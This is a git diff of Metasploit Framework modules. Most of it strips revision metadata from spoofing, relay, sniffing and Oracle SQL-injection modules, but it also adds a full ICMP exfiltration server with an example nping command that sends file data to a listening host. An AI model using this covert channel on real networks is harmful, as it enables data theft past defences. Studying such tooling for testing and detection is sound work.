a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 2edb6392ec..97e530ecf4 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'HTTP Client MS Credential Relayer', - 'Version' => '$Revision$', 'Description' => %q{ This module relays negotiated NTLM Credentials from an HTTP server to multiple protocols. Currently, this module supports relaying to SMB and HTTP. diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb new file mode 100644 index 0000000000..c6a0321c80 --- /dev/null +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -0,0 +1,260 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Capture + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'ICMP Exfiltration Service', + 'Description' => %q{ + This module is designed to provide a server-side component to receive and store files + exfiltrated over ICMP echo request packets. + + To use this module you will need to send an initial ICMP echo request containing the + specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or + a random filename can be assisnged). All data received from this source will automatically + be added to the receive buffer until an ICMP echo request containing a specific end trigger + (defaults to '^EOL') is received. + + Suggested Client: + Data can be sent from the client using a variety of tools. One such example is nping (included + with the NMAP suite of tools) - usage: nping --icmp 10.0.0.1 --data-string "BOFtest.txt" -c1 + }, + 'Author' => 'Chris John Riley', + 'License' => MSF_LICENSE, + 'References' => + [ + # packetfu + ['URL','https://github.com/todb/packetfu'], + # nping + ['URL', 'http://nmap.org/book/nping-man.html'], + # simple icmp + ['URL', 'http://blog.c22.cc/2012/02/17/quick-post-fun-with-python-ctypes-simpleicmp/'] + ] + ) + + register_options([ + OptString.new('START_TRIGGER', [true, 'Trigger for beginning of file', '^BOF']), + OptString.new('END_TRIGGER', [true, 'Trigger for end of file', '^EOF']), + OptString.new('RESP_START', [true, 'Data to respond when initial trigger matches', 'SEND']), + OptString.new('RESP_CONT', [true, 'Data ro resond when continuation of data expected', 'OK']), + OptString.new('RESP_END', [true, 'Data to response when EOF received and data saved', 'COMPLETE']), + OptString.new('BPF_FILTER', [true, 'BFP format filter to listen for', 'icmp']), + OptString.new('INTERFACE', [false, 'The name of the interface']), + OptBool.new('FNAME_IN_PACKET', [true, 'Filename presented in first packet straight after START_TRIGGER', true]) + ], self.class) + + register_advanced_options([ + OptEnum.new('CLOAK', [true, 'OS fingerprint to use for packet creation', 'linux', ['windows', 'linux', 'freebsd']]), + OptBool.new('PROMISC', [true, 'Enable/Disable promiscuous mode', false]), + OptAddress.new('LOCALIP', [false, 'The IP address of the local interface']) + ], self.class) + + deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','UDP_SECRET','GATEWAY','NETMASK', 'TIMEOUT') + end + + def run + begin + # check Pcaprub is up to date + if not netifaces_implemented? + print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available") + netifaces = false + else + netifaces = true + end + + @interface = datastore['INTERFACE'] || Pcap.lookupdev + # this is needed on windows cause we send interface directly to Pcap functions + @interface = get_interface_guid(@interface) + @iface_ip = datastore['LOCALIP'] + @iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces + raise "Interface IP is not defined and can not be guessed" unless @iface_ip + + # start with blank slate + @record = false + @record_data = '' + + if datastore['PROMISC'] + print_status("Warning: Promiscuous mode enabled. This may cause issues!") + end + + # start icmp listener process - loop + icmp_listener + + ensure + store_file + print_status("\nStopping ICMP listener on #{@interface} (#{@iface_ip})") + end + end + + def icmp_listener + # start icmp listener + + print_status("ICMP Listener started on #{@interface} (#{@iface_ip}). Monitoring for trigger packet containing #{datastore['START_TRIGGER']}") + if datastore['FNAME_IN_PACKET'] + print_status("Filename expected in initial packet, directly following trigger (e.g. #{datastore['START_TRIGGER']}filename.ext)") + end + + cap = PacketFu::Capture.new( + :iface => @interface, + :start => true, + :filter => datastore['BPF_FILTER'], + :promisc => datastore['PROMISC'] + ) + loop { + cap.stream.each do | pkt | + packet = PacketFu::Packet.parse(pkt) + data = packet.payload[4..-1] + + if packet.is_icmp? and data =~ /#{datastore['START_TRIGGER']}/ + # start of new file detected + vprint_status("#{Time.now}: ICMP (type %d code %d) SRC:%s DST:%s" % + [packet.icmp_type, packet.icmp_code, packet.ip_saddr, packet.ip_daddr]) + + # detect and warn if system is responding to ICMP echo requests + # suggested fixes: + # -(linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all + # -(Windows) netsh firewall set icmpsetting 8 disable + # -(Windows) netsh firewall set opmode mode = ENABLE + + if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip + print_error "Dectected ICMP echo response. You must either disable ICMP handling" + print_error "or try a more restrictive BPF filter. You might try:" + print_error " set BPF_FILTER icmp and not src #{datastore['LOCALIP']}" + return + end + + if @record + print_error("New file started without saving old data") + store_file + end + + # begin recording stream + @record = true + @record_host = packet.ip_saddr + @record_data = '' + + # set filename from data in incoming icmp packet + if datastore['FNAME_IN_PACKET'] + @filename = data[((datastore['START_TRIGGER'].length)-1)..-1].strip + end + # if filename not sent in packet, or FNAME_IN_PACKET false set time based name + if not datastore['FNAME_IN_PACKET'] or @filename.empty? + @filename = "icmp_exfil_" + ::Time.now.to_i.to_s # set filename based on current time + end + + print_good("Beginning capture of \"#{@filename}\" data") + + # create response packet icmp_pkt + icmp_response, contents = icmp_packet(packet, datastore['RESP_START']) + + if not icmp_response + raise RuntimeError ,"Could not build ICMP response" + else + # send response packet icmp_pkt + send_icmp(icmp_response, contents) + end + + elsif packet.is_icmp? and @record and @record_host == packet.ip_saddr + # check for EOF marker, if not continue recording data + + if data =~ /#{datastore['END_TRIGGER']}/ + # end of file marker found + print_status("#{@record_data.length} bytes of data recevied in total") + print_good("End of File received. Saving \"#{@filename}\" to loot") + store_file + + # create response packet icmp_pkt + icmp_response, contents = icmp_packet(packet, datastore['RESP_END']) + + if not icmp_response + raise RuntimeError , "Could not build ICMP response" + else + # send response packet icmp_pkt + send_icmp(icmp_response, contents) + end + + # turn off recording and clear status + @record = false + @record_host = '' + @record_data = '' + + else + # add data to recording and continue + @record_data << data.to_s() + vprint_status("Received #{data.length} bytes of data from #{packet.ip_saddr}") + + # create response packet icmp_pkt + icmp_response, contents = icmp_packet(packet, datastore['RESP_CONT']) + + if not icmp_response + raise RuntimeError , "Could not build ICMP response" + else + # send response packet icmp_pkt + send_icmp(icmp_response, contents) + end + end + end + end + } + end + + def icmp_packet(packet, contents) + # create icmp response + + @src_ip = packet.ip_daddr + src_mac = packet.eth_daddr + @dst_ip = packet.ip_saddr + dst_mac = packet.eth_saddr + icmp_id = packet.payload[0,2] + icmp_seq = packet.payload[2,2] + + # create payload with matching id/seq + resp_payload = icmp_id + icmp_seq + contents + + icmp_pkt = PacketFu::ICMPPacket.new(:flavor => datastore['CLOAK'].downcase) + icmp_pkt.eth_saddr = src_mac + icmp_pkt.eth_daddr = dst_mac + icmp_pkt.icmp_type = 0 + icmp_pkt.icmp_code = 0 + icmp_pkt.payload = resp_payload + icmp_pkt.ip_saddr = @src_ip + icmp_pkt.ip_daddr = @dst_ip + icmp_pkt.recalc + + icmp_response = icmp_pkt + + return icmp_response, contents + end + + def send_icmp(icmp_response, contents) + # send icmp response on selected interface + icmp_response.to_w(iface = @interface) + vprint_good("Response sent to #{@dst_ip} containing response trigger : \"#{contents}\"") + end + + def store_file + # store the file in loot if data is present + if @record_data and not @record_data.empty? + loot = store_loot( + "icmp_exfil", + "text/xml", + @src_ip, + @record_data, + @filename, + "ICMP Exfiltrated Data" + ) + print_good("Incoming file \"#{@filename}\" saved to loot") + print_good("Loot filename: #{loot}") + end + end +end diff --git a/modules/auxiliary/server/pxexploit.rb b/modules/auxiliary/server/pxexploit.rb index 4ed4ca7aa8..ca46df566c 100644 --- a/modules/auxiliary/server/pxexploit.rb +++ b/modules/auxiliary/server/pxexploit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'PXE Boot Exploit Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that diff --git a/modules/auxiliary/server/socks4a.rb b/modules/auxiliary/server/socks4a.rb index 4d8fdeb902..92d4b9b6b1 100644 --- a/modules/auxiliary/server/socks4a.rb +++ b/modules/auxiliary/server/socks4a.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Socks4a Proxy Server', - 'Version' => '$Revision$', 'Description' => 'This module provides a socks4a proxy server that uses the builtin Metasploit routing to relay connections.', 'Author' => 'sf', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index de5891fd53..12369ba295 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SOCKS Proxy UNC Path Redirection', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a Socks proxy service that redirects all HTTP requests to a web page that diff --git a/modules/auxiliary/server/tftp.rb b/modules/auxiliary/server/tftp.rb index f95dd7d4d4..c9b5f6724c 100644 --- a/modules/auxiliary/server/tftp.rb +++ b/modules/auxiliary/server/tftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'TFTP File Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a TFTP service }, diff --git a/modules/auxiliary/server/webkit_xslt_dropper.rb b/modules/auxiliary/server/webkit_xslt_dropper.rb index d7c1f7e69f..6d7bc9c2b5 100644 --- a/modules/auxiliary/server/webkit_xslt_dropper.rb +++ b/modules/auxiliary/server/webkit_xslt_dropper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary C:\Program Files\ }, 'Author' => [ 'Nicolas Gregoire' ], - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'Actions' => [ diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb index eebcd8643d..d8127e28f4 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'pSnuffle Packet Sniffer', - 'Version' => '$Revision$', 'Description' => 'This module sniffs passwords like dsniff did in the past', 'Author' => 'Max Moser ', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index 7fad7e6731..0cf36ddff6 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'ARP Spoof', - 'Version' => '$Revision$', 'Description' => %q{ Spoof ARP replies and poison remote ARP caches to conduct IP address spoofing or a denial of service. }, diff --git a/modules/auxiliary/spoof/cisco/dtp.rb b/modules/auxiliary/spoof/cisco/dtp.rb index 588495ce74..99f9f5f8cc 100644 --- a/modules/auxiliary/spoof/cisco/dtp.rb +++ b/modules/auxiliary/spoof/cisco/dtp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super( 'Name' => 'Forge Cisco DTP Packets', - 'Version' => '$Revision$', 'Description' => %q{ This module forges DTP packets to initialize a trunk port. }, diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index e5a842abde..2e7c20ba66 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary 'Cedric Blancher ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1447' ], diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index df60299919..b646e33607 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - require 'msf/core' require 'net/dns' require 'resolv' @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'I)ruid', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1447' ], diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index a61385da27..c297dbd5b5 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ], diff --git a/modules/auxiliary/spoof/nbns/nbns_response.rb b/modules/auxiliary/spoof/nbns/nbns_response.rb index 1ac2c4a7c7..9767bc4807 100644 --- a/modules/auxiliary/spoof/nbns/nbns_response.rb +++ b/modules/auxiliary/spoof/nbns/nbns_response.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Tim Medin ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html' ] diff --git a/modules/auxiliary/spoof/replay/pcap_replay.rb b/modules/auxiliary/spoof/replay/pcap_replay.rb index 5b3541b49c..f34b2d5ba4 100644 --- a/modules/auxiliary/spoof/replay/pcap_replay.rb +++ b/modules/auxiliary/spoof/replay/pcap_replay.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Pcap Replay Utility', - 'Version' => '$Revision$', 'Description' => %q{ Replay a pcap capture file }, diff --git a/modules/auxiliary/spoof/wifi/airpwn.rb b/modules/auxiliary/spoof/wifi/airpwn.rb index 915d5dc5ae..b16474fcb9 100644 --- a/modules/auxiliary/spoof/wifi/airpwn.rb +++ b/modules/auxiliary/spoof/wifi/airpwn.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Airpwn TCP Hijack', - 'Version' => '$Revision$', 'Description' => %q{ TCP streams are 'protected' only in so much as the sequence number is not guessable. diff --git a/modules/auxiliary/spoof/wifi/dnspwn.rb b/modules/auxiliary/spoof/wifi/dnspwn.rb index 3fbc7ca8f4..61a68e5b5e 100644 --- a/modules/auxiliary/spoof/wifi/dnspwn.rb +++ b/modules/auxiliary/spoof/wifi/dnspwn.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DNSpwn DNS Hijack', - 'Version' => '$Revision$', 'Description' => %q{ Race DNS responses and replace DNS queries }, diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index 78cfb20f14..f6421601d3 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3996' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index eadbff66b5..5156e9099d 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3995' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index e4518a2e93..189e4de457 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0870' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb index 982cf8a00e..597cf9eb19 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2415' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index 2327ed1aed..2adc8ff236 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2081' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index 81380d3a72..b927ed215c 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index 585e9540a2..dca09dbefc 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index 10a708726e..bf15b6e6b8 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com' ], diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index 171b57a99d..1850dd3021 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Sh2kerr ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3979' ], diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index 3c230cca7d..3b858000ec 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'sid[at]notsosecure.com' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0866'], diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index 0aed4857b6..723e2101dc 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'sid[at]notsosecure.com' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0866'], diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 8de44140c3..06b4463732 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'CG' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3982'], diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 1de25f1a6c..baa82d5c57 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['CG'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5511'], diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index 061e42beef..a1152ef368 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'CG' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3983'], diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index 917851d2dd..1177f1f591 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Sh2kerr ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3984' ], diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index 89cf84c236..68c8319599 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0978' ], diff --git a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb index adc18b0953..016d1487f4 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -16,7 +12,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VSploit Mariposa DNS Query Module', - 'Version' => '$Revision$', 'Description' => 'This module queries known Mariposa Botnet DNS records.', 'Author' => 'MJC', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/vsploit/malware/dns/dns_query.rb b/modules/auxiliary/vsploit/malware/dns/dns_query.rb index 9b0f8823b2..08eb17597d 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_query.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_query.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # # This file is part of the Metasploit Framework and may be subject to @@ -17,7 +13,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VSploit DNS Beaconing Emulation', - 'Version' => '$Revision$', 'Description' => 'This module takes a list and emulates malicious DNS beaconing.', 'Author' => 'MJC', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb index 2648670df7..aef1be35e0 100644 --- 